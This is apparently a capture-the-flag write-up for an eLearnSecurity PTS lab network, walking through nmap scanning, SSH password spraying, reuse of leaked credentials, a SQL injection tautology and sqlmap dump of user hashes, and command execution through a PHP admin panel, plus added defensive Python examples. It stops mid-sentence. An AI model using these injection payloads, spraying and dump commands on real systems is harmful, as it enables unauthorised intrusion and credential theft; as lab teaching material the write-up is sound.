Second CTF from eLearnSecurity's PTS course.

Blackbox scenario (web application vulnerabilities, SQL injection). Connected to the internal network via eth0.

Task: find flags on all hosts connected to network.

⇒ Tools used: Nmap, BurpSuite, Dirb, Sqlmap, Metasploit (MSFvenom, MSFpayload & listener for a reverse TCP shell)

Stage I - Information Gathering:

lab environment, no OSINT applicable

Stage II - Footprinting and Scanning

Nmap

Stage III - Vulnerability Assessment

Nessus

Stage IV - Web Attacks

Dirb - Enumerating web resources
SQLMap - SQL injections

Stage V - System Attacks

N/A

Starting the mapping routine with an nmap ping scan for live hosts in our network 172.16.64.0/24:

Nmap
┌──(root💀kali)-[~]
└─# nmap -sn 172.16.64.0/24 -oN discovery.nmap

Next we sort out the discovered IP addresses, excluding our own attacking IP, and write them to a text file that we then feed into a full TCP scan:

┌──(root💀kali)-[~]
└─# cat discovery.nmap | grep for
Nmap scan report for 172.16.64.81
Nmap scan report for 172.16.64.91
Nmap scan report for 172.16.64.92
Nmap scan report for 172.16.64.166
Nmap scan report for 172.16.64.10
                                                                                                                     
┌──(root💀kali)-[~]
└─# cat discovery.nmap | grep for | grep -v
Usage: grep [OPTION]... PATTERNS [FILE]...
Try 'grep --help' for more information.
                                                                                                                     
┌──(root💀kali)-[~]
└─# cat discovery.nmap | grep for | grep -v "\.10"                                                                2 ⨯
Nmap scan report for 172.16.64.81
Nmap scan report for 172.16.64.91
Nmap scan report for 172.16.64.92
Nmap scan report for 172.16.64.166
                                                                                                                     
┌──(root💀kali)-[~]
└─# cat discovery.nmap | grep for | grep -v "\.10" | cut -d " " -f 5 > ipscan.txt 
                                                                                                                     
┌──(root💀kali)-[~]
└─# cat ipscan.txt                                                                
172.16.64.81
172.16.64.91
172.16.64.92
172.16.64.166
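A more robust way to build the target list than the grep pipeline above, as an added Python example that is not part of the original write-up: it parses the "Nmap scan report for" lines of an -oN file (with or without a resolved hostname) and excludes the attacker address by exact match, so an address such as 172.16.64.100 is kept, whereas grep -v "\.10" drops every address containing ".10". The sample report below is constructed.

```python
import ipaddress
import re

# Constructed sample of an "nmap -sn ... -oN" report (not the page's actual file):
# it contains the attacker's own address (.10) and an address in the .10x range
# to show why a substring filter like grep -v "\.10" would drop too much.
SAMPLE_DISCOVERY = """\
# Nmap 7.91 scan initiated Sat Feb 13 13:20:01 2021 as: nmap -sn 172.16.64.0/24 -oN discovery.nmap
Nmap scan report for cms.foocorp.io (172.16.64.81)
Host is up (0.071s latency).
Nmap scan report for 172.16.64.91
Host is up (0.076s latency).
Nmap scan report for 172.16.64.92
Host is up (0.076s latency).
Nmap scan report for 172.16.64.100
Host is up (0.080s latency).
Nmap scan report for 172.16.64.166
Host is up (0.077s latency).
Nmap scan report for 172.16.64.10
Host is up.
# Nmap done at Sat Feb 13 13:20:04 2021 -- 256 IP addresses (6 hosts up) scanned in 3.21 seconds
"""

# Matches both "Nmap scan report for 1.2.3.4" and "Nmap scan report for name (1.2.3.4)".
REPORT_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?(\d{1,3}(?:\.\d{1,3}){3})\)?\s*$")


def live_hosts(report_text, exclude):
    """Return the live IPs from an nmap -oN report, minus the addresses in `exclude`.

    Exclusion is by exact address, so 172.16.64.10 is dropped while 172.16.64.100
    is kept; a substring filter such as grep -v "\\.10" would drop both.
    """
    excluded = {ipaddress.ip_address(a) for a in exclude}
    found = []
    for line in report_text.splitlines():
        m = REPORT_RE.match(line)
        if not m:
            continue
        addr = ipaddress.ip_address(m.group(1))
        if addr in excluded or addr in found:
            continue
        found.append(addr)
    # ip_address objects sort numerically, not lexically (.100 after .92)
    return [str(a) for a in sorted(found)]


def write_target_list(report_text, exclude, path):
    """Write the filtered list one address per line, the format nmap -iL expects."""
    hosts = live_hosts(report_text, exclude)
    with open(path, "w") as fh:
        fh.write("\n".join(hosts) + "\n")
    return hosts


if __name__ == "__main__":
    print("\n".join(live_hosts(SAMPLE_DISCOVERY, exclude=["172.16.64.10"])))
```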

Using these commands for main Nmap scan and network mapping:

• -sV for version identification
• -n for disabling reverse DNS lookup
• -v for verbose output
• -Pn to assume the host is alive
• -p- to scan all the ports
• -T4 to speed things up
• -iL to use a list of IPs as input (ipscan.txt)
• -A to run all scans in order to maximize output

Ok, so we have a full TCP scan of the network:

┌──(root💀kali)-[~]
└─# nmap -sV -n -v -Pn -p- -T4 -iL ipscan.txt -A --open

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-13 13:29 EST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 13:29
Completed NSE at 13:29, 0.00s elapsed
Initiating NSE at 13:29
Completed NSE at 13:29, 0.00s elapsed
Initiating NSE at 13:29
Completed NSE at 13:29, 0.00s elapsed
Initiating ARP Ping Scan at 13:29
Scanning 4 hosts [1 port/host]
Completed ARP Ping Scan at 13:29, 0.14s elapsed (4 total hosts)
Initiating SYN Stealth Scan at 13:29
Scanning 4 hosts [65535 ports/host]
Discovered open port 8080/tcp on 172.16.64.166
Discovered open port 53/tcp on 172.16.64.92
Discovered open port 22/tcp on 172.16.64.92
Discovered open port 80/tcp on 172.16.64.91
Discovered open port 80/tcp on 172.16.64.92
Discovered open port 22/tcp on 172.16.64.81
Discovered open port 80/tcp on 172.16.64.81
Discovered open port 63306/tcp on 172.16.64.92
Discovered open port 13306/tcp on 172.16.64.81
SYN Stealth Scan Timing: About 49.09% done; ETC: 13:30 (0:00:32 remaining)
Discovered open port 6379/tcp on 172.16.64.91
Discovered open port 2222/tcp on 172.16.64.166
Completed SYN Stealth Scan against 172.16.64.166 in 60.39s (3 hosts left)
Completed SYN Stealth Scan against 172.16.64.81 in 60.46s (2 hosts left)
Completed SYN Stealth Scan against 172.16.64.92 in 60.46s (1 host left)
Completed SYN Stealth Scan at 13:30, 60.48s elapsed (262140 total ports)
Initiating Service scan at 13:30
Scanning 11 services on 4 hosts
Completed Service scan at 13:30, 16.52s elapsed (11 services on 4 hosts)
Initiating OS detection (try #1) against 4 hosts
Retrying OS detection (try #2) against 4 hosts
Retrying OS detection (try #3) against 4 hosts
Retrying OS detection (try #4) against 4 hosts
Retrying OS detection (try #5) against 4 hosts
NSE: Script scanning 4 hosts.
Initiating NSE at 13:31
Completed NSE at 13:31, 8.50s elapsed
Initiating NSE at 13:31
Completed NSE at 13:31, 1.40s elapsed
Initiating NSE at 13:31
Completed NSE at 13:31, 0.02s elapsed

Nmap scan report for cms.foocorp.io (172.16.64.81)
Host is up (0.071s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 df:60:fc:fc:db:4b:be:b6:3e:7a:4e:84:4c:a1:57:7d (ECDSA)
|_  256 ce:8c:fe:bd:76:77:8e:bd:c9:b8:8e:dc:66:b8:80:38 (ED25519)
80/tcp    open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-favicon: Unknown favicon MD5: D9D96DC60A8AEA55B0288E7A1D43ECC0
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 10 disallowed entries
| /assets/ /css/ /emails/ /img/ /includes/ /install/
|_/lang/ /sociallogin/ /templates/ /upload/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Log in » FooCorp File Sharing
13306/tcp open  mysql   MySQL 5.7.25-0ubuntu0.16.04.2
| mysql-info:
|   Protocol: 10
|   Version: 5.7.25-0ubuntu0.16.04.2
|   Thread ID: 6465
|   Capabilities flags: 63487
|   Some Capabilities: SupportsCompression, Support41Auth, ConnectWithDatabase, FoundRows, DontAllowDatabaseTableColumn, Speaks41ProtocolOld, SupportsTransactions, InteractiveClient, SupportsLoadDataLocal, LongColumnFlag, ODBCClient, IgnoreSigpipes, LongPassword, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: bfX\x1A(\x19\x12MCc\x08\x01,.\x06^nD
|_  Auth Plugin Name: mysql_native_password
MAC Address: 00:50:56:87:EB:CC (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=2/13%OT=22%CT=1%CU=36143%PV=Y%DS=1%DC=D%G=Y%M=005056%T
OS:M=60281AFB%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10B%TI=Z%CI=I%II=I
OS:%TS=8)OPS(O1=M4E7ST11NW7%O2=M4E7ST11NW7%O3=M4E7NNT11NW7%O4=M4E7ST11NW7%O
OS:5=M4E7ST11NW7%O6=M4E7ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6
OS:=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M4E7NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O
OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=40%CD=S)

Uptime guess: 0.565 days (since Fri Feb 12 23:57:35 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT      ADDRESS
1   71.44 ms 172.16.64.81

Nmap scan report for 172.16.64.91
Host is up (0.076s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
6379/tcp open  redis   Redis key-value store
MAC Address: 00:50:56:87:5D:60 (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=2/13%OT=80%CT=1%CU=44772%PV=Y%DS=1%DC=D%G=Y%M=005056%T
OS:M=60281AFB%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=109%TI=Z%CI=I%II=I
OS:%TS=8)OPS(O1=M4E7ST11NW7%O2=M4E7ST11NW7%O3=M4E7NNT11NW7%O4=M4E7ST11NW7%O
OS:5=M4E7ST11NW7%O6=M4E7ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6
OS:=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M4E7NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O
OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=40%CD=S)

Uptime guess: 0.596 days (since Fri Feb 12 23:13:29 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE
HOP RTT      ADDRESS
1   75.52 ms 172.16.64.91

Nmap scan report for 172.16.64.92
Host is up (0.076s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 f4:86:09:b3:d6:d1:ba:d0:28:65:33:b7:82:f7:a6:34 (RSA)
|   256 3b:d7:39:c3:4f:c4:71:a2:16:91:d1:8f:ac:04:a8:16 (ECDSA)
|_  256 4f:43:ac:70:09:a6:36:c6:f5:b2:28:b8:b5:53:07:4c (ED25519)
53/tcp    open  domain  dnsmasq 2.75
| dns-nsid:
|_  bind.version: dnsmasq-2.75
80/tcp    open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Photon by HTML5 UP
63306/tcp open  mysql   MySQL 5.7.25-0ubuntu0.16.04.2
| mysql-info:
|   Protocol: 10
|   Version: 5.7.25-0ubuntu0.16.04.2
|   Thread ID: 2164
|   Capabilities flags: 63487
|   Some Capabilities: SupportsCompression, Support41Auth, ConnectWithDatabase, FoundRows, DontAllowDatabaseTableColumn, Speaks41ProtocolOld, SupportsTransactions, InteractiveClient, SupportsLoadDataLocal, LongColumnFlag, ODBCClient, IgnoreSigpipes, LongPassword, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: \x0FA\x07=<}e\x0Ej\x0B\x03d}*MI30Gz
|_  Auth Plugin Name: mysql_native_password
MAC Address: 00:50:56:87:DA:08 (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=2/13%OT=22%CT=1%CU=32145%PV=Y%DS=1%DC=D%G=Y%M=005056%T
OS:M=60281AFB%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10B%TI=Z%CI=I%II=I
OS:%TS=8)OPS(O1=M4E7ST11NW7%O2=M4E7ST11NW7%O3=M4E7NNT11NW7%O4=M4E7ST11NW7%O
OS:5=M4E7ST11NW7%O6=M4E7ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6
OS:=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M4E7NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O
OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=40%CD=S)

Uptime guess: 0.618 days (since Fri Feb 12 22:42:10 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT      ADDRESS
1   75.63 ms 172.16.64.92

Nmap scan report for 172.16.64.166
Host is up (0.077s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 a6:1e:f8:c6:eb:32:0a:f6:29:c8:de:86:b7:4c:a0:d7 (RSA)
|   256 b9:94:56:c7:4d:63:ad:bd:2d:5e:26:43:75:78:07:6f (ECDSA)
|_  256 d6:82:45:0a:51:4e:01:2d:6a:be:fa:cf:75:de:46:a0 (ED25519)
8080/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Ucorpora Demo
MAC Address: 00:50:56:87:B3:22 (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=2/13%OT=2222%CT=1%CU=38731%PV=Y%DS=1%DC=D%G=Y%M=005056
OS:%TM=60281AFB%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=103%TI=Z%CI=I%II
OS:=I%TS=8)SEQ(SP=103%GCD=1%ISR=103%TI=Z%II=I%TS=8)OPS(O1=M4E7ST11NW7%O2=M4
OS:E7ST11NW7%O3=M4E7NNT11NW7%O4=M4E7ST11NW7%O5=M4E7ST11NW7%O6=M4E7ST11)WIN(
OS:W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210
OS:%O=M4E7NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R
OS:=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%
OS:A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%
OS:DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIP
OS:L=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Uptime guess: 0.586 days (since Fri Feb 12 23:27:05 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT      ADDRESS
1   77.24 ms 172.16.64.166

NSE: Script Post-scanning.
Initiating NSE at 13:31
Completed NSE at 13:31, 0.00s elapsed
Initiating NSE at 13:31
Completed NSE at 13:31, 0.00s elapsed
Initiating NSE at 13:31
Completed NSE at 13:31, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 4 IP addresses (4 hosts up) scanned in 101.47 seconds
           Raw packets sent: 263495 (11.611MB) | Rcvd: 263336 (10.548MB)

Let's start with attacking the 172.16.64.166 machine. Port 8080 is open, so let's check the web application on URL http://172.16.64.166:8080/

Without crawling the website yet, but rather looking at its main functionalities and interesting areas, we find that the “About Us” section has a login area. Not much to see here; however, on inspecting the page's source code we can see that the hidden content is already present in the HTML:

Inspecting the site with BurpSuite Repeater:

Saving these names is probably a good idea. Alright, so what else do we have? Nmap reported SSH on port 2222, which is unusual already, but let's look at it in more detail by trying to log in with the usernames we just found, in the form ssh <username>@172.16.64.166 -p 2222

That was easy. The user 'Sabrina' didn't change her password and we could simply use CHANGEME to gain access.

sabrina@xubuntu:~$ ls
flag.txt  hosts.bak

The hosts.bak file contains this:

	127.0.0.1	localhost
	172.16.64.81	cms.foocorp.io
	172.16.64.81    static.foocorp.io

	# The following lines are desirable for IPv6 capable hosts
	::1     ip6-localhost ip6-loopback
	fe00::0 ip6-localnet
	ff00::0 ip6-mcastprefix
	ff02::1 ip6-allnodes
	ff02::2 ip6-allrouters 



==> The SSH attack we just did is called "Password Spraying": one password (CHANGEME in this case) is tried once against each identified user, so that no account gets locked out. Here the password was suggested in the terminal. In real-life engagements you might try passwords like “February2021” once for every user; the larger the enterprise, the better the odds that someone uses a password in such a format.
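From the defender's side, as an added example that is not part of the original write-up: the spray described above leaves a distinctive trace in sshd's auth.log, one or two failures per account from a single source within a short window, which is the opposite shape of a brute force against one account. The log lines below are constructed, and the window and thresholds are assumptions to tune per environment.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd lines in the classic /var/log/auth.log format (not from the lab
# hosts): 172.16.64.10 tries one password per account, 10.0.0.5 hammers one account.
SAMPLE_AUTH_LOG = """\
Feb 13 13:40:01 xubuntu sshd[2211]: Failed password for invalid user admin from 172.16.64.10 port 51002 ssh2
Feb 13 13:40:03 xubuntu sshd[2213]: Failed password for john from 172.16.64.10 port 51004 ssh2
Feb 13 13:40:05 xubuntu sshd[2215]: Failed password for peter from 172.16.64.10 port 51006 ssh2
Feb 13 13:40:07 xubuntu sshd[2217]: Accepted password for sabrina from 172.16.64.10 port 51008 ssh2
Feb 13 13:41:00 xubuntu sshd[2230]: Failed password for bob from 10.0.0.5 port 40000 ssh2
Feb 13 13:41:10 xubuntu sshd[2231]: Failed password for bob from 10.0.0.5 port 40001 ssh2
Feb 13 13:41:20 xubuntu sshd[2232]: Failed password for bob from 10.0.0.5 port 40002 ssh2
Feb 13 13:41:30 xubuntu sshd[2233]: Failed password for bob from 10.0.0.5 port 40003 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)


def parse_auth_log(text, year=2021):
    """Return (timestamp, source_ip, user, accepted) for every password-auth event.

    Syslog lines carry no year, so the caller supplies it (assumed 2021 here).
    """
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["src"], m["user"], m["result"] == "Accepted"))
    return events


def detect_sprays(events, window_minutes=10, min_users=3, max_per_user=2):
    """Flag sources that touch many distinct accounts with few attempts each
    inside one time window. A brute force on a single account (many attempts,
    one user) is deliberately not matched here; it deserves its own rule."""
    by_src = defaultdict(list)
    for ev in events:
        by_src[ev[1]].append(ev)
    findings = {}
    for src, evs in by_src.items():
        evs.sort()
        for i, (start, _, _, _) in enumerate(evs):
            window = [e for e in evs[i:]
                      if (e[0] - start).total_seconds() <= window_minutes * 60]
            per_user = defaultdict(int)
            for _, _, user, _ in window:
                per_user[user] += 1
            if len(per_user) >= min_users and max(per_user.values()) <= max_per_user:
                findings[src] = {
                    "users": sorted(per_user),
                    # a spray that actually logged in is the case shown on this page
                    "succeeded": sorted({u for _, _, u, ok in window if ok}),
                }
                break
    return findings


if __name__ == "__main__":
    for src, info in detect_sprays(parse_auth_log(SAMPLE_AUTH_LOG)).items():
        print(f"possible password spray from {src}: {info}")
```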

Since we just obtained the virtual host for IP 172.16.64.81 let's move on to attack it next.

To do that we first add the virtual host names to our /etc/hosts file so that we can resolve them from our machine.

	172.16.64.81	cms.foocorp.io
	172.16.64.81    static.foocorp.io



Now our system can resolve these host names into IP addresses and, at the same time, the browser adds the proper Host header to the HTTP requests so that the back-end server serves the appropriate virtual host. Fine, so once we've updated /etc/hosts let's visit cms.foocorp.io.
By the way, since BurpSuite requires a premium membership to crawl websites I'll go with OWASP ZAP for crawling; apart from that, BurpSuite seems more fun, at least to me. But you can probably use either: Burp and ZAP are very similar in terms of functionality.

Ok, so what do we find with our web crawling. While analyzing all folders with ZAP we find that in the website's img folder there's a backup file with user credentials!


OK, so we got

john1:password123
peter:youdonotguessthatone5

Let's try them on cms.foocorp.io



We get redirected to the URL /500.php:

The requested URL /500.php was not found on this server.

However, upon inspecting this redirection in BurpSuite we find credentials!




Turns out that the application leaks database credentials in its headers. Let's use these to log into the database. We have the port from the nmap scan so we're good to go.

x41x41x412019!
13306

Aaaand, yes, indeed. We're in:




Searching within the database gets us the flag:

MySQL [(none)]> use cmsbase;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [cmsbase]> show tables;
+----------------------------+
| Tables_in_cmsbase          |
+----------------------------+
| flag                       |
| sqlmapfile                 |
| tbl_1_actions_log          |
| tbl_1_categories           |
| tbl_1_categories_relations |
| tbl_1_downloads            |
| tbl_1_files                |
| tbl_1_files_relations      |
| tbl_1_folders              |
| tbl_1_groups               |
| tbl_1_members              |
| tbl_1_members_requests     |
| tbl_1_notifications        |
| tbl_1_options              |
| tbl_1_password_reset       |
| tbl_1_users                |
| tbl_actions_log            |
| tbl_categories             |
| tbl_categories_relations   |
| tbl_downloads              |
| tbl_files                  |
| tbl_files_relations        |
| tbl_folders                |
| tbl_groups                 |
| tbl_members                |
| tbl_members_requests       |
| tbl_notifications          |
| tbl_options                |
| tbl_password_reset         |
| tbl_users                  |
+----------------------------+
30 rows in set (0.054 sec)

MySQL [cmsbase]> select * from flag;
+----+------------------------------+
| id | content                      |
+----+------------------------------+
|  1 | Congratulations, you got it! |
+----+------------------------------+
1 row in set (0.063 sec)

MySQL [cmsbase]> 



In our nmap scan we saw that there's a DNS server in the network. Let's compromise it next.

Visiting 172.16.64.92, a JavaScript pop-up alert shows up:



While inspecting the source code, the included script

<script src="assets/js/footracking.js"></script>

looks interesting. Clicking it leads to this:



alert("Loaded!");
<!-- pre-login collect data -->
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
	if (this.readyState == 4 && this.status == 200) {
		console.log("OK");
	} else {
		console.log("Error!");
	}

	xhr.open("GET", "http://127.0.0.1/72ab311dcbfaa40ca0739f5daf505494/tracking2.php", true);
	xhr.send("ua=" + navigator.userAgent + "&platform=" + navigator.platform);
}

Ok, let's play with that a bit. It seems that the alert box came from this script. Also, we notice the link is pointing to localhost. We can check if this path is valid on the server side: http://172.16.64.92/72ab311dcbfaa40ca0739f5daf505494/tracking2.php



Nope, restricted area. That was tracking2.php; let's see if tracking.php, without the 2 at the end, behaves any differently: http://172.16.64.92/72ab311dcbfaa40ca0739f5daf505494/tracking.php






Alright, tracking.php exists on the server but the button seems broken. Let's inspect it on Burp:



Reading the source code we can reconstruct the parameter and issue a valid request to the URL with id=1, which returns the page for that id. To check for SQL injection we then append a tautology: id=1' or 's'='s


Great!

Ok, let's sqlmap this now

$ sqlmap -u http://172.16.64.92/72ab311dcbfaa40ca0739f5daf505494/tracking.php?id=1 --users

The SQL injection vulnerability is officially confirmed, let's dump the tables.
┌──(root💀kali)-[~]
└─# sqlmap -u http://172.16.64.92/72ab311dcbfaa40ca0739f5daf505494/tracking.php?id=1 --dump -D footracking -T users


[4 entries]
+----+-----+-------------------------------------------+-----------+
| id | adm | password                                  | username  |
+----+-----+-------------------------------------------+-----------+
| 1  | yes | c5d71f305bb017a66c5fa7fd66535b84          | fcadmin1  |
| 2  | yes | 14d69ee186f8d9bbeddd4da31559ce0f          | fcadmin2  |
| 3  | yes | 827ccb0eea8a706c4c34a16891f84e7b (12345)  | tracking1 |
| 4  | no  | e10adc3949ba59abbe56e057f20f883e (123456) | tracking2 |
+----+-----+-------------------------------------------+-----------+
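The tautology check and the dump above, as an added Python example (not the lab's tracking.php and not code from the original write-up): the same id parameter is run through a string-built query, the pattern that makes tracking.php?id= injectable, and through a validated, parameterized one. SQLite stands in for the MySQL back end, and the table rows are constructed placeholders that only mirror the column layout of the dump.

```python
import sqlite3


# Constructed in-memory stand-in for the footracking database. The columns mirror
# the sqlmap dump above; the password values are placeholders, not the dumped hashes.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, adm TEXT, password TEXT, username TEXT)")
    db.executemany(
        "INSERT INTO users VALUES (?, ?, ?, ?)",
        [
            (1, "yes", "<hash-placeholder-1>", "fcadmin1"),
            (2, "yes", "<hash-placeholder-2>", "fcadmin2"),
            (3, "yes", "<hash-placeholder-3>", "tracking1"),
            (4, "no", "<hash-placeholder-4>", "tracking2"),
        ],
    )
    return db


def lookup_vulnerable(db, id_param):
    """The injectable pattern: the request parameter is pasted into the SQL text,
    so a quote inside id closes the literal and the remainder is parsed as SQL."""
    sql = f"SELECT id, username FROM users WHERE id = '{id_param}'"
    return db.execute(sql).fetchall()


def lookup_hardened(db, id_param):
    """Validate the expected type first, then bind the value as a parameter;
    the database never parses user input as SQL."""
    if not id_param.isdigit():
        raise ValueError("id must be a positive integer")
    return db.execute(
        "SELECT id, username FROM users WHERE id = ?", (int(id_param),)
    ).fetchall()


def compare(id_param):
    """Run one parameter through both lookups; returns (vulnerable_rows, hardened_rows),
    with None where the hardened version rejected the input."""
    db = make_db()
    vulnerable_rows = len(lookup_vulnerable(db, id_param))
    try:
        hardened_rows = len(lookup_hardened(db, id_param))
    except ValueError:
        hardened_rows = None
    return vulnerable_rows, hardened_rows


if __name__ == "__main__":
    for param in ("1", "1' or 's'='s"):
        print(repr(param), "->", compare(param))
```

With the page's payload the string-built query returns every row of the table, while the hardened lookup refuses the input before it reaches the database.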


Ok, so we got user/password combinations. Let's enumerate with dirb to find hidden URLs under http://172.16.64.92/72ab311dcbfaa40ca0739f5daf505494
┌──(root💀kali)-[~]
└─# dirb http://172.16.64.92/72ab311dcbfaa40ca0739f5daf505494

It shows a /login path on the server. We enter the credentials there, and it works: we're in the admin console :)

The URL is http://172.16.64.92/72ab311dcbfaa40ca0739f5daf505494/panel.php so it's a php console. We can verify by typing phpinfo(); into the panel:


Browsing through the console we find the flag in /var/www

echo "<pre>";system("ls -la /var/www");echo"</pre>";system("cat /var/www/flag.txt");
system("cat /var/www/flag.txt");


Since it's a DNS server, let's check out its /etc/hosts file, where we find this entry:

